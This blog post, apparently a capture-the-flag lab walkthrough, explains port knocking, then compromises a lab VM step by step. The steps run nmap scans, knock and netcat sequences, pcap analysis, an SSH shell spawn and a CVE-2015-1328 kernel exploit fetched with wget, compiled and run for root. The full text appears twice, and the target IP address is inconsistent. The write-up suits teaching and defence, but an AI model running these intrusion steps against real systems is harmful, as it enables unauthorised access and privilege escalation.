PORT Knocking Attack
TL;DR
This blog will explore the ‘nuances’ about Port knocking which is a security method used to protect computer systems from unauthorized access attempts. It involves sending a pre-defined sequence of connection attempts to specific network ports on the server, which will trigger the opening of certain ports for communication. This technique adds an additional layer of security by keeping the ports closed until the correct sequence is received. However, port knocking is not dependable and can be vulnerable to replay and brute-force attacks. It is recommended to use it in combination with other security measures.
What is port knocking?
For information to be passed through a port, said port needs to first be enabled. This is intended as a barrier to malicious activity, but like many other security safeguards, attackers can bypass this minor security measure. Port knocking is what will open up these closed ports and allow information to flow into a previously closed port.
How does port knocking work?
Port knocking works by sending information packets with certain characteristics to a port. These packets of information comprise attempted connections to a predefined selection of closed ports and can include specific strings, unusual flags and other distinctive characteristics.
Once the selection of ports have had these packets sent to them, port opening is normally performed by the organization’s host-based firewall or other comparable custom software. This has been observed to initiate both dynamic opening of listening ports and connections to listening servers on another system.
The different ways to port knock
While all port knocking techniques involve sending signal packets to a port to trigger communication, the methods by which they accomplish this task can be different. One method, exemplified by the malicious program Cd00r, sniffs for the packets by using **libpcap libraries**. Another method enables malware to use open ports used by other programs by leveraging raw sockets. Either method you use, the result is the same — communication can now move through a previously closed port.
Going a step further, there are different types of port knocks. The most commonly used knocks are:
-
Covert knocks: Covert knocks, also known as covert port knocking, is a technique used to conceal the use of port knocking to gain access to a system. This method involves hiding the port knocking sequence within normal network traffic, making it harder to detect and block by network administrators. However, using covert knocks raises security concerns and can potentially lead to unauthorized access if not properly secured. -
Dynamic knocks: Dynamic knocks is an advanced form of port knocking that generates a new sequence of connection attempts for every login attempt. This makes it more difficult for attackers to guess or intercept the port knocking sequence, thereby improving the security of the system. Dynamic knocks typically require a client-side software to generate the connection attempts, and can be implemented using various programming languages and protocols. However, Dynamic knocks can be more complex to set up and may require additional configuration compared to traditional port knocking methods. -
One-time knocks: One-time knocks, also known as single-use knocks, is a type of port knocking that generates a unique sequence of connection attempts for each login attempt. Unlike traditional port knocking methods where the same sequence is used repeatedly, one-time knocks generate a new sequence each time, making it more difficult for attackers to guess or intercept the port knocking sequence.One-time knockscan enhance the security of the system by reducing the risk of replay attacks and unauthorized access. However, one-time knocks can also be more complex to set up and may require additional configuration compared to traditional port knocking methods.
Requirements for Demonstrating the Attack:
Starting the Process: 🪓
1.) Scan your network using the netdiscover command and observe an IP address 192.168.1.13 in the network.Please refer to the POC below:
2.) Enumerate the target through aggressive scan; type following command for nmap scanning:
nmap -p- -A 192.168.1.13
So here I found only single port 80 is open
3.)Upon discovering that port 80 was open, the browser was opened, and the target IP 192.168.1.13 was navigated to. While browsing the page, a link labeled ‘Woah’ was encountered and promptly clicked.
4.) The hyperlink named ‘Woah’ consists of a file named ‘pcap1.pcap’, which was downloaded to discover a clue.
5.) Upon opening the file with Wireshark, it was observed that the VM box attempted to establish connections over TCP ports ‘7000’, ‘8000’, and ‘9000’. However, the attempts made on these ports were ‘discarded’, and some efforts were obstructed with a connection ‘RST’, ‘ACK’. Further analysis revealed that this technique is commonly known as ‘port knocking’.
6.)Send packets to ‘7000’, ‘8000’, ‘9000’ so that these ports sequence will open another port. Therefore type the following command for nmap to perform a Sequential Port Scan:
nmap -r -p 7000,8000,9000 192.168.1.13
7.)Utilize the ‘knock’ utility to knock on the specified ports, and use ‘Netcat’ to establish a connection with this port. Upon connecting to this port, it can be observed that a new ‘directory’ on the Web Server has been disclosed.Therefore type the following command to knock the ports:
knock -v 192.168.1.13 7000 8000 9000 8888 ; nc 192.168.1.13 7000
8.) Upon discovering a new directory, the browser was accessed to navigate to ‘192.168.1.25/burgerworld/’.Then again a new found file ‘pcap2.pcap’, was downloaded promptly.
9.) Once more, I used Wireshark to open the ‘pcap2’ file, but this time I was unable to locate any port knocking sequence. As a result, I picked a packet at random and followed its ‘TCP stream’ by right-clicking on it and selecting the “follow” option.
10.) Capturing the TCP stream revealed an image that points towards another clue. The message is: ‘Can you understand my message?!’.
11.) The message was written in ‘German’, and upon translation, it read ‘one three three seven.’ This could indicate that port 1337 is another potential ‘knocking port’.
12.) Utilize the ‘knock’ utility to knock on the specified port one more time, and use ‘Netcat’ to establish a connection with this port. Observe that port 1337 get opened which points towards ‘/iamcornholio/’
13.) Next, investigate ‘192.168.1.25/iamcornholio/’. During this inspection, a base64-encoded string was discovered. Decoding this string is necessary to progress further..
14.) The string was decoded, revealing another port knocking sequence.To decode the string use the following command
echo "T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK" | base64 -d
15.) The previous port knocking technique was leveraged.
knock -v 192.168.1.13 8888 9999 7777 6666; ssh 192.168.1.13
16.) Logging in using the ‘disclosed credentials’ worked, but the session closed almost immediately.
17.) The following command was executed, successfully spawning a shell on the target:
knock -v 192.168.1.13 8888 9999 7777 6666; ssh [email protected] "/bin/sh"
18.) After logging in successfully, the kernel version was identified as 3.13.0, reading the ‘nachos’ file which reveals ‘Obtained a lower shell; the objective is to attain root access’. Commands used:
uname -a
cat nachos
19.) The kernal version revealed susceptibility to ‘CVE-2015-1328’, enabling local privilege escalation through overlay mounts in user namespaces. Exploiting this flaw could result in administrative privileges and facilitate capturing the flag.Commands used:
wget https://www.exploit-db.com/download/37292
ls
mv 37292 priv.c
gcc priv.c -o priv
./priv
id
cd /root
ls
cat SECRETZ
MITIGATION
To prevent the Port Knocking from being exploited, we can do the below mitigations:
- Implement secure and complex knock sequences
- Use multi-factor authentication
- Enforce IP restrictions
- Monitor network traffic for suspicious behavior
- Implement a VPN or firewall rules that only allow authorized IP addresses to access specific ports
References:
Ally
~ Kartik
TL;DR
This blog will explore the ‘nuances’ about Port knocking which is a security method used to protect computer systems from unauthorized access attempts. It involves sending a pre-defined sequence of connection attempts to specific network ports on the server, which will trigger the opening of certain ports for communication. This technique adds an additional layer of security by keeping the ports closed until the correct sequence is received. However, port knocking is not dependable and can be vulnerable to replay and brute-force attacks. It is recommended to use it in combination with other security measures.
What is port knocking?
For information to be passed through a port, said port needs to first be enabled. This is intended as a barrier to malicious activity, but like many other security safeguards, attackers can bypass this minor security measure. Port knocking is what will open up these closed ports and allow information to flow into a previously closed port.
How does port knocking work?
Port knocking works by sending information packets with certain characteristics to a port. These packets of information comprise attempted connections to a predefined selection of closed ports and can include specific strings, unusual flags and other distinctive characteristics.
Once the selection of ports have had these packets sent to them, port opening is normally performed by the organization’s host-based firewall or other comparable custom software. This has been observed to initiate both dynamic opening of listening ports and connections to listening servers on another system.
The different ways to port knock
While all port knocking techniques involve sending signal packets to a port to trigger communication, the methods by which they accomplish this task can be different. One method, exemplified by the malicious program Cd00r, sniffs for the packets by using **libpcap libraries**. Another method enables malware to use open ports used by other programs by leveraging raw sockets. Either method you use, the result is the same — communication can now move through a previously closed port.
Going a step further, there are different types of port knocks. The most commonly used knocks are:
-
Covert knocks: Covert knocks, also known as covert port knocking, is a technique used to conceal the use of port knocking to gain access to a system. This method involves hiding the port knocking sequence within normal network traffic, making it harder to detect and block by network administrators. However, using covert knocks raises security concerns and can potentially lead to unauthorized access if not properly secured. -
Dynamic knocks: Dynamic knocks is an advanced form of port knocking that generates a new sequence of connection attempts for every login attempt. This makes it more difficult for attackers to guess or intercept the port knocking sequence, thereby improving the security of the system. Dynamic knocks typically require a client-side software to generate the connection attempts, and can be implemented using various programming languages and protocols. However, Dynamic knocks can be more complex to set up and may require additional configuration compared to traditional port knocking methods. -
One-time knocks: One-time knocks, also known as single-use knocks, is a type of port knocking that generates a unique sequence of connection attempts for each login attempt. Unlike traditional port knocking methods where the same sequence is used repeatedly, one-time knocks generate a new sequence each time, making it more difficult for attackers to guess or intercept the port knocking sequence.One-time knockscan enhance the security of the system by reducing the risk of replay attacks and unauthorized access. However, one-time knocks can also be more complex to set up and may require additional configuration compared to traditional port knocking methods.
Requirements for Demonstrating the Attack:
Starting the Process: 🪓
1.) Scan your network using the netdiscover command and observe an IP address 192.168.1.13 in the network.Please refer to the POC below:
2.) Enumerate the target through aggressive scan; type following command for nmap scanning:
nmap -p- -A 192.168.1.13
So here I found only single port 80 is open
3.)Upon discovering that port 80 was open, the browser was opened, and the target IP 192.168.1.13 was navigated to. While browsing the page, a link labeled ‘Woah’ was encountered and promptly clicked.
4.) The hyperlink named ‘Woah’ consists of a file named ‘pcap1.pcap’, which was downloaded to discover a clue.
5.) Upon opening the file with Wireshark, it was observed that the VM box attempted to establish connections over TCP ports ‘7000’, ‘8000’, and ‘9000’. However, the attempts made on these ports were ‘discarded’, and some efforts were obstructed with a connection ‘RST’, ‘ACK’. Further analysis revealed that this technique is commonly known as ‘port knocking’.
6.)Send packets to ‘7000’, ‘8000’, ‘9000’ so that these ports sequence will open another port. Therefore type the following command for nmap to perform a Sequential Port Scan:
nmap -r -p 7000,8000,9000 192.168.1.13
7.)Utilize the ‘knock’ utility to knock on the specified ports, and use ‘Netcat’ to establish a connection with this port. Upon connecting to this port, it can be observed that a new ‘directory’ on the Web Server has been disclosed.Therefore type the following command to knock the ports:
knock -v 192.168.1.13 7000 8000 9000 8888 ; nc 192.168.1.13 7000
8.) Upon discovering a new directory, the browser was accessed to navigate to ‘192.168.1.25/burgerworld/’.Then again a new found file ‘pcap2.pcap’, was downloaded promptly.
9.) Once more, I used Wireshark to open the ‘pcap2’ file, but this time I was unable to locate any port knocking sequence. As a result, I picked a packet at random and followed its ‘TCP stream’ by right-clicking on it and selecting the “follow” option.
10.) Capturing the TCP stream revealed an image that points towards another clue. The message is: ‘Can you understand my message?!’.
11.) The message was written in ‘German’, and upon translation, it read ‘one three three seven.’ This could indicate that port 1337 is another potential ‘knocking port’.
12.) Utilize the ‘knock’ utility to knock on the specified port one more time, and use ‘Netcat’ to establish a connection with this port. Observe that port 1337 get opened which points towards ‘/iamcornholio/’
13.) Next, investigate ‘192.168.1.25/iamcornholio/’. During this inspection, a base64-encoded string was discovered. Decoding this string is necessary to progress further..
14.) The string was decoded, revealing another port knocking sequence.To decode the string use the following command
echo "T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK" | base64 -d
15.) The previous port knocking technique was leveraged.
knock -v 192.168.1.13 8888 9999 7777 6666; ssh 192.168.1.13
16.) Logging in using the ‘disclosed credentials’ worked, but the session closed almost immediately.
17.) The following command was executed, successfully spawning a shell on the target:
knock -v 192.168.1.13 8888 9999 7777 6666; ssh [email protected] "/bin/sh"
18.) After logging in successfully, the kernel version was identified as 3.13.0, reading the ‘nachos’ file which reveals ‘Obtained a lower shell; the objective is to attain root access’. Commands used:
uname -a
cat nachos
19.) The kernal version revealed susceptibility to ‘CVE-2015-1328’, enabling local privilege escalation through overlay mounts in user namespaces. Exploiting this flaw could result in administrative privileges and facilitate capturing the flag.Commands used:
wget https://www.exploit-db.com/download/37292
ls
mv 37292 priv.c
gcc priv.c -o priv
./priv
id
cd /root
ls
cat SECRETZ
MITIGATION
To prevent the Port Knocking from being exploited, we can do the below mitigations:
- Implement secure and complex knock sequences
- Use multi-factor authentication
- Enforce IP restrictions
- Monitor network traffic for suspicious behavior
- Implement a VPN or firewall rules that only allow authorized IP addresses to access specific ports
References:
Ally
~ Kartik